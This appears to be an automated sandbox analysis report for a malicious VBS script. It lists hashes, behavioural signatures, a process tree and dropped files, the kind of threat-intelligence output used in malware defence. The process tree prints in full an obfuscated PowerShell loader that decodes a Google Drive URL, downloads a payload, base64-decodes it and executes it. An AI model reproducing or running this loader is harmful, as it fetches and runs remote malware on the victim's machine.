Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/06/2024, 07:17

General

  • Target

    dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs

  • Size

    25KB

  • MD5

    e21aac072a10d80842d362743e1ffa59

  • SHA1

    d8b3aeffe2eedc17e06bafecd26b603c6a8908b9

  • SHA256

    dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde

  • SHA512

    7046ea4afb9ce9b490bf4fd7f2db533bded2eefc88dc64a80809f5e7fef6d184b2259a15cb06f6f1ebb92dcbd1a9b5f8d471ae1201557d07075827ad2a7ffa78

  • SSDEEP

    384:r0Dk2uAnMKYHzkvaZGxeecfCPNPh7ZbIxUXGDZ6SMTXJ7pZXi7m4d4ud0oekM25z:r0o2/YHocW9ZUxa6K5i5B75aFzoWLv3K

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tubas = 1;Function Brigaderen($Tautegory){$Chomper=$Tautegory.Length-$Tubas;$Fremkalderskaalene='Substring';For( $Varicelloid=7;$Varicelloid -lt $Chomper;$Varicelloid+=8){$Rumfangsformler+=$Tautegory.$Fremkalderskaalene.Invoke( $Varicelloid, $Tubas);}$Rumfangsformler;}function Eritreansk($Gnubbe){ . ($Rimesters) ($Gnubbe);}$Gauffering75=Brigaderen ' IsobioMSuper eoKarleagzdetekteiHyd icalVanillalcopitapaReh.ndl/Sgefu.k5jagtudf.R.versi0 l.ntie Al.enat(BigeminW rediviguldaldn cepterd jogschoPro toow Efte ts Potli, VulkanbNMisstatTAdenody Tetraf1 .ymeno0,tuccos.Coprodu0Radarov; Isoch Allerp.WUdbudsmi KloofenSque.ch6aesthet4Galskab;peachi, Kont.ahx Gldsfo6 Omn pr4 Gibb r;Bevidst Indha,rLnniveavSensiti:Afg.fts1Brepose2Dioptid1 Horrid.K,melwa0Antropo)Vederkv LinjeriGUforudseTrouveucLatestrkSwoonedo ,azoca/Biote n2Benedic0Usurp r1Frembyd0skabera0Kvilibr1Uneq.ab0Ne.lige1Stanges ,eprofoF DomeniiOnt.logr HymenoeFestm dfTegnekooTainofoxPakse.s/a,ledes1Sitolog2Swahili1 Anmass. Phytol0Bis.ten ';$Skyl96=Brigaderen 'T istedULanternsDesil,cePeriodfrLandbru-postverAKrad.ergFoliatoeFaatallnWe,ooletFormule ';$Sommerlejrs=Brigaderen 'SynoekyhMellititAudiofot KinnikpT akeoesUdrykni:Ser.ice/ Quisli/Neur.med LavaerrS.ayboliPrsteskvUdsendoeTings,e. Raimeng Funde oAnt.ropo Orbitsg Ci,ronlTvangsae Dis as.NewtonkcBrislino mitsomm Glorif/ BestrauNupt,alcAvleres? skrivee,afjulex.rnnegap RescoroHovedpirXeromortFlamini=InterlidReko,vaouskaanswfjset mnDgneneolUnrev roFrilleraSmaaligdPrealle& RecitaiParafradTakneml=Dagsomm1.ationaURunesteaV.rksomEAnlgstj6.ennierA Over.t9RadioakoU,rligsGimdeg.aNLuftvrd6 WildfoEGo lsspLEkst,ab_ un eekvHolognadKreisfuvBesttergDa.nissORecessiv,everymOUnfraud4 ,nnovaN Do,rpihi,cipieMVandyke5TvelydeaCourtroVContrabVpreaggrl RverkuA.ejlmeldC,oruseOUnderst ';$Underetagens=Brigaderen '.olitur> Atomke ';$Rimesters=Brigaderen 'Bl.ckiniInflatieMala,maxColiand ';$Outkicked='Studiebesg';$Materialprvning160 = Brigaderen 'U contre Aggresc Bruddeh imdesaoSk.llen Analys%Av nceraPostvsepFangedepTowboatdSamfundaAbsoluttReificeaMestern%Bjlena,\ MultisCQuaintea,rooklymPaxillapTiebo.thosseocao Op niar SolidaaMumpme,tOverflyeHugge,e.JonosfrI.ndecimnSkip.edtSullied Narcoba&Sightse&Marchen AbrasaxeByfo.edcAsilusbhVandforoFolkeva Staalvt Catost ';Eritreansk (Brigaderen 'Piastre$ WantwigSvalegalToadi.roMisdi.ibKonjunkaArbejd l Tandpa:RetorsiRbeknigheNeurot cArbejdsaDo ahshlRingmrkcOverdiliD masketFredlysrPaeonysa Hkerkvt VentaiiRipo,fsoGlas.blnHazel o=fortynd(Fore.skcOverma,mkontokud Efters Antioxi/Be,vangcFremskr Restau$AntepagM CaconyaS,yggert ,attedeIndbererdresseriDiscomma esaticlVrdiladp JordberLgnede.vShithean StyriniDametvanCubomedgFen,ici1Rivalin6K,ntine0Hastesa) An,ass ');Eritreansk (Brigaderen 'Knytte,$RestuffgH.ightslVillachou.gkarlbpy,anssaLabbe,elfolkepa:PhotoporNonintreMacedois UdspritAldohepiMicrocaaNonneglcSuccesle FlygtnoRefingeu SamarbsFor.ikr=Constri$ScablanS HalopeoShoneysmMaca.ammMegathee StikpirGebinddl FrikadeOpacifij PalliarMyxopods Rooibo. PiberesTeaerl,pPhotodelReconceiIsocardtVanskab(Cosmopo$ FirvreU FuskthnHockeysdSaalegne.ythagorPseudo eBiochipt Bioscoa BasarsgredigereHokeyconPrelatesBrunrod)Whensoe ');$Sommerlejrs=$restiaceous[0];$Fjerdedeles= (Brigaderen 'For,rin$BrakpljgEmbed mlsammenkoSystemibRecomf a SidetalZygophy:PhysiopDN dkulesC.rdifoi,rdikengRegrabb=GennembNTraheeneBlondelwDraabne-MissampOCyanomeb H.ppenj kandideInternacRabbinatSendeti CinnamoSramp neySupere,sEksplictCyanamieTegneb.mStoress.UgennemNTran,ple godfretFunktio. Kro,odWLdermbleBystandbUnde.paCneonreklHenseeniI relateSildigenIncorpst');$Fjerdedeles+=$Recalcitration[1];Eritreansk ($Fjerdedeles);Eritreansk (Brigaderen 'Incom,l$ForshapDFa cines SeamosiUnthrivgMorion..MutuallHbefordre Amtr caUnte,podDisinfeeStringmrPuruloisSalolda[Ci cums$venere SFizzkn kBeskyttyBu,dfarlSu,erla9Tenorsa6Sammenl]Litoral=Dispens$ paavisG .etameaBut,kopuEftera fN keligfHypodereSak istrBoligbeivoldshan Dokumeg Afs,ri7Afgjord5Veinies ');$Georgians=Brigaderen ' Warmho$ .izequDStoedtdsbaroksti MeowsrgS.illin.Fjer itDHemicenoExponibwSp.rtsfnPladskrl Indu.topalstafaA,mstoldDeposi,F AnbriniTrikololRuflende Tegl,n(Underkj$DeklassSCompulso BrostemMahalapm Fag ideOpvarmer .nkasslformalieunmol.sjSlackenrKoppev,sDefinit,Politik$SkisporMStolemarAmetabok PingueeorbiculsB,selbeaAssa sigHindbrmeIrrepenrBvresdenGawbyloe UppbadsH.stori2Helsink2gyn dio9U,raabs) .ejrst ';$Mrkesagernes229=$Recalcitration[0];Eritreansk (Brigaderen 'Sabel,i$Disor,egSpaanpllCancio oTende cbProlixiaP.acidnlR sprmi:KatetenMDrmmereoAs ptolsDrumloieyesotiddEurus.beBowl.ss=Mishags(Lionis.TPresseeeRespectsTe.oristUnprotu-Paatr,kPUnoperaacryogentPas ourh Ang oc A vtage$Fort,ltMHsternerRevisiokCamelidepestaersInst.ncaHidkaldgExemptieSystemprAtomermnNanomete OuthypsMeshuga2 negois2Calpack9Sektere)Damasce ');while (!$Mosede) {Eritreansk (Brigaderen 'Vertika$Gtepag.gRepulsilDominanoAfspejlbFremtida aastoflfli,pet:kogerskUToksikodUdbud,tsinclusomCarinasyUnwhimpk etingkDiminiseUncolladUnabashe Hellig=,ovetin$UnhookstPerioptrcallipyuLigningeTis yks ') ;Eritreansk $Georgians;Eritreansk (Brigaderen 'SubetleS GudesatSloteneaUdskejerRek.isit S.para-GudgiveSAldolizlPilledbeMicromee Paral,pValdrap Miljakt4wardshi ');Eritreansk (Brigaderen 'Fetaost$EksemplganstteslFstemndoGiselanbBrucellaAtomhemlVaeltei:HypostoMM.skottoUbetonesNonaffieSikkerhdUndvrlie Klangf=Genindt(DemonstTWate,steDingless unr sutPoritef-DethronPRaaski.aK lonistMinensjhhobbyh, Foge,er$Vei.ersM be.ogtrGutturikHearseceTaliasbs baklysaMeddelagSniv,leeElskerir Ov,rlbnSe,iaeneLigenessTrkosts2 Snakel2 Owerle9Gangste) T atha ') ;Eritreansk (Brigaderen 'Bortfre$Sub lobgUsdeli.lTe,eskooSale wobKikke,taRealiv lAcetoth:De igraSLactuceuMeijizepPy,opesp unnito.ogiernsRitzymeibrskur.tLascarii OpridsoUncredinUltranaeSlittesrPilchernSeismogeLotionpsunbaste9siv pit6 Deling=Hyp,rvi$Tun,ellg ParlialBruustaoPennysibTri.lunaBeladyilCa,diog:Qu.nariSTh,rdisevelsestrOvereatgSkraalelTimelofoHighbinb M.ssekuFrizadolHundekuiMander n Eflreh+ Co,nte+ Tumlin% ,emiau$bisayanrCamailseGhostf.sKitchentgluciddiCoggledaSmileryc Egen,ie Bog aroFortaleuDeclinesPepin.l.BnkendecYeomanho Ste nuuPlatyrrn otifitSki,rco ') ;$Sommerlejrs=$restiaceous[$Suppositionernes96];}$Udmrker9=329315;$Betjentene=28891;Eritreansk (Brigaderen '.adioas$ .esvergMangelllOvertemo InnuatbVenligha anuttlVikl,ng:.ndianeSfagstudtBkkenbuuVagtskip forbrneB.silicfAksemagiAbbrevieCommissr nsehol Trnere=hyg,eni Sk,etsoGZygota.eEx,alantstvstor-MaskensCBoardinoTopogranGudstjetGu.dsmeeCentaurnStrudsmtUninter Underf$Int,midM L.keror He,tevk Perinee.nopskys,rebaneaAfbarkeg acunareskorsterFremlaenHaystaceCarnivosTvangsi2Fikserb2Antagon9.orship ');Eritreansk (Brigaderen ' R,sgif$OmvisnigSubcomml RetrogoHou,elebKontohaaPeck kal Algebr:ReabsoreLogli enEncroacgdobbeltrPalaeobo BacksesMe.ernepEqu.cosr Hvaleri tejst,sErhver,eterpentrGnavernnHovedhjeOv rhitsPilgrim Lrebo s=Disa,fe Umyndig[F totekS BadestyRondelesRestriktPrologied.svulnmDebitso.Su.tesgCFeller.oUndervanAfmyto,vTildrage SemisirBetjenitWhitewa]Purpure:vestitu:NuzzerkFIntratrr IsraeloSharon,mSerienuBBigeminaBambu,ms Assotse ,ubten6Medtage4 k ravaSRoerenttHilltoprDesignli promenn tidiphgTruantl( Remoti$SlappetSIntell tPi,paycuStraffepBrdskreebra,kedf ,tinkaiMilj eee SexiporStyrkel)Trepidl ');Eritreansk (Brigaderen 'Per.spl$Surpr.cgSejlspolRadereto Epi,iabPredeleareshowelFrisken:jammerlSnondetrnVillaseu UnsmokgSpgelsegAfstamnlDngendeyLegatkr Indlade=Alenepi Venst,e[Enwe veSAnallany H,linesVoldf tt Ken.aueSvidesumBromate.Hovel,iTBadeniceDeklamax NonrattEmpathi.EngraftEBe,alusnBle endcSubtopioFlorizidMedarbei,ancuninIndustrgblkhusu]Varskor:U,splen: OverseAIm roprS okumeCTrningsIDerivatIForuren.SlingreG KrigsmeDesperatHandglaSHo.ocert Hoevisr SimbliiLdigerenPetuniegudkonku(Vestmen$Bi,telee ProgranC,ntraegMantaudrLochinooFirebrisV,versbpSodak,gr,ngarebiUrpremisReemergeReexprerVrdifasnRanidpreUnshipwsCo.mand) Snesko ');Eritreansk (Brigaderen 'Amylans$BlennotgLjerliglKul.urboArbejdsbD,mfldtaCleanlilSinfoni:kl,pperOOmklassnIllegaldindtal uDenimsnl GldesleRaavildrGlidebaeLineolad DobbeleVand.ogsForuren=Erwinco$TrilogiSSurahipnVariantuCha,ottg P.rtrtgDisservlSka aerySkiftva.Douchins AfkalkuR stendbVolatilsIstr,ant Fonetir Insurri SamsennEsdragogForrib (Skjalde$Vug,iesU irginidEternizmStrapher GlippekPennepreSmirk urLedeord9Sendere,Uncount$OverdecB Daabsfe Vaagebt Rotatij Dyret e .ageannPrydsastHeptrane Re.tetnConcerteReds.ar)incurre ');Eritreansk $Onduleredes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"
        3⤵
          PID:1180

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

            Filesize

            8KB

            MD5

            19c2705572794894cfb99f2e8a39e54a

            SHA1

            bbb7ed43de4aa50aaee18cfa4cfb9e00ec834d5c

            SHA256

            24a1748ccda00bef2a8f1ad7a464a30d9215a04e72710dd8ce1e8b3c7ee90c99

            SHA512

            7dd8667ca72a4400dc245736f7fd712f85cf5a5459c06f706f6a320f79f8b6696ded2d7f97c79b1957fcf6f442b8a65fc7134b123d64ea732fd65853cf29c1df

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0sxdlstl.5lr.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/3644-313-0x00007FFE89773000-0x00007FFE89775000-memory.dmp

            Filesize

            8KB

          • memory/3644-314-0x000001F412B10000-0x000001F412B32000-memory.dmp

            Filesize

            136KB

          • memory/3644-324-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-325-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-328-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-329-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB

          • memory/3644-332-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

            Filesize

            10.8MB